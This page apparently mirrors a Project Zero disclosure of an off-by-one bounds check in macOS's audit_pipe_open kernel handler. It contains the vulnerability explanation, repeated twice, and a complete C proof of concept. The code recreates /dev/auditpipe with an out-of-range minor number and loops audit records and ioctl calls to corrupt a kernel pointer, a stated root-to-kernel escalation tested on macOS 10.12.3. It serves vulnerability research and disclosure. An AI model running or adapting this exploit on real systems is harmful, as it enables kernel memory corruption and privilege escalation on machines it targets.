扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 |
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1126 MacOS kernel memory corruption due to off-by-one in audit_pipe_open audit_pipe_open is the special file open handler for the auditpipe device (major number 10.) Here's the code: static int audit_pipe_open(dev_t dev, __unused int flags,__unused int devtype, __unused proc_t p) { struct audit_pipe *ap; int u; u = minor(dev); if (u < 0 || u > MAX_AUDIT_PIPES) return (ENXIO); AUDIT_PIPE_LIST_WLOCK(); ap = audit_pipe_dtab[u]; if (ap == NULL) { ap = audit_pipe_alloc(); if (ap == NULL) { AUDIT_PIPE_LIST_WUNLOCK(); return (ENOMEM); } audit_pipe_dtab[u] = ap; We can control the minor number via mknod. Here's the definition of audit_pipe_dtab: static struct audit_pipe*audit_pipe_dtab[MAX_AUDIT_PIPES]; There's an off-by-one in the minor number bounds check (u < 0 || u > MAX_AUDIT_PIPES) should be (u < 0 || u >= MAX_AUDIT_PIPES) The other special file operation handlers assume that the minor number of an opened device is correct therefore it isn't validated for example in the ioctl handler: static int audit_pipe_ioctl(dev_t dev, u_long cmd, caddr_t data, __unused int flag, __unused proc_t p) { ... ap = audit_pipe_dtab[minor(dev)]; KASSERT(ap != NULL, ("audit_pipe_ioctl: ap == NULL")); ... switch (cmd) { case FIONBIO: AUDIT_PIPE_LOCK(ap); if (*(int *)data) Directly after the audit_pipe_dtab array in the bss is this global variable: static u_int64_taudit_pipe_drops; audit_pipe_drops will be incremented each time an audit message enqueue fails: if (ap->ap_qlen >= ap->ap_qlimit) { ap->ap_drops++; audit_pipe_drops++; return; } So by setting a small ap_qlimit via the AUDITPIPE_SET_QLIMIT ioctl we can increment the struct audit_pipe* which is read out-of-bounds. For this PoC I mknod a /dev/auditpipe with the minor number 32, create a new log file and enable auditing. I then set the QLIMIT to 1 and alternately enqueue a new audit record and call and ioctl. Each time the enqueue fails it will increment the struct audit_pipe* then the ioctl will try to use that pointer. This is a root to kernel privesc. tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 */ //ianbeer #if 0 MacOS kernel memory corruption due to off-by-one in audit_pipe_open audit_pipe_open is the special file open handler for the auditpipe device (major number 10.) Here's the code: static int audit_pipe_open(dev_t dev, __unused int flags,__unused int devtype, __unused proc_t p) { struct audit_pipe *ap; int u; u = minor(dev); if (u < 0 || u > MAX_AUDIT_PIPES) return (ENXIO); AUDIT_PIPE_LIST_WLOCK(); ap = audit_pipe_dtab[u]; if (ap == NULL) { ap = audit_pipe_alloc(); if (ap == NULL) { AUDIT_PIPE_LIST_WUNLOCK(); return (ENOMEM); } audit_pipe_dtab[u] = ap; We can control the minor number via mknod. Here's the definition of audit_pipe_dtab: static struct audit_pipe *audit_pipe_dtab[MAX_AUDIT_PIPES]; There's an off-by-one in the minor number bounds check (u < 0 || u > MAX_AUDIT_PIPES) should be (u < 0 || u >= MAX_AUDIT_PIPES) The other special file operation handlers assume that the minor number of an opened device is correct therefore it isn't validated for example in the ioctl handler: static int audit_pipe_ioctl(dev_t dev, u_long cmd, caddr_t data, __unused int flag, __unused proc_t p) { ... ap = audit_pipe_dtab[minor(dev)]; KASSERT(ap != NULL, ("audit_pipe_ioctl: ap == NULL")); ... switch (cmd) { case FIONBIO: AUDIT_PIPE_LOCK(ap); if (*(int *)data) Directly after the audit_pipe_dtab array in the bss is this global variable: static u_int64_t audit_pipe_drops; audit_pipe_drops will be incremented each time an audit message enqueue fails: if (ap->ap_qlen >= ap->ap_qlimit) { ap->ap_drops++; audit_pipe_drops++; return; } So by setting a small ap_qlimit via the AUDITPIPE_SET_QLIMIT ioctl we can increment the struct audit_pipe* which is read out-of-bounds. For this PoC I mknod a /dev/auditpipe with the minor number 32, create a new log file and enable auditing. I then set the QLIMIT to 1 and alternately enqueue a new audit record and call and ioctl. Each time the enqueue fails it will increment the struct audit_pipe* then the ioctl will try to use that pointer. This is a root to kernel privesc. tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 #endif #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <net/bpf.h> #include <net/if.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <bsm/audit.h> #include <security/audit/audit_ioctl.h> int main(int argc, char** argv) { system("rm -rf /dev/auditpipe"); system("mknod /dev/auditpipe c 10 32"); int fd = open("/dev/auditpipe", O_RDWR); if (fd == -1) { perror("failed to open auditpipe device\n"); exit(EXIT_FAILURE); } printf("opened device\n"); system("touch a_log_file"); int auditerr = auditctl("a_log_file"); if (auditerr == -1) { perror("failed to set a new log file\n"); } uint32_t qlim = 1; int err = ioctl(fd, AUDITPIPE_SET_QLIMIT, &qlim); if (err == -1) { perror("AUDITPIPE_SET_QLIMIT"); exit(EXIT_FAILURE); } while(1) { char* audit_data = "\x74hello"; int audit_len = strlen(audit_data)+1; audit(audit_data, audit_len); uint32_t nread = 0; int err = ioctl(fd, FIONREAD, &qlim); if (err == -1) { perror("FIONREAD"); exit(EXIT_FAILURE); } } return 0; } |
体验盒子
